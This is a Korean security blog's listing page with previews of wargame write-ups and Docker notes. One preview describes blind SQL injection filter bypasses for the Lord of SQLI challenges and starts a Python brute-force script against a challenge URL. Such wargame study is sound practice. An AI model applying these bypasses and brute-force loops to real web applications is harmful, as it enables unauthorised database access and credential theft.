본문 바로가기

분류 전체보기264

[pwnable.tw] calc 풀이 보호되어 있는 글 입니다. 2021. 8. 8.
[Pwnable] Heap chunk 정리 보호되어 있는 글 입니다. 2021. 8. 5.
[Lord of SQLI] golem, darkknight, bugbear, giant, assassin 풀이 golem admin 의 pw 를 알아내면 되는, blind sql injection 문제다. or, and => ||, && 으로 우회 substr => left 로 우회 '=' => like 로 우회 이런느낌으로, blind sqli 소스를 짜보자 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 import requests import string s=requests.Session() url='https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw=' pw='' for i in range(1,9): for c in string.digits+string.ascii_lowercase: query="' .. 2021. 7. 28.
[Docker] Docker 간단정리 & pwnable 문제 deploy (with docker-compose) container VS vm 기존에 있던 VirtureMachine 은 하드웨어를 가상화 해서, 한 머신에서 여러 서버를 구동시킬 수 있다. hypervisor 에서 여러 머신을 구동할 수 있게 해주기 때문에다. 근데 머신에 사용되는 각각의 os image 를 올리기 때문에, 메모리, 저장장치에서 overhead 를 추가시킨다. 이런 VM 과는 달리, container 는 호스트 os, 커널 , 바이너리, 라이브러리를 공유해서 vm 과는 다르게, 가볍고 빠르다. 프로세스의 실행환경을 격리하기 때문이다 host 커널과 container 의 커널이 달라도, 다른 부분만 패키징 해서 커널이 다른 container 도 쓸 수 있다. 하지만, 가볍다고 장점만 있는 것은 아니다. container 은, host o.. 2021. 7. 22.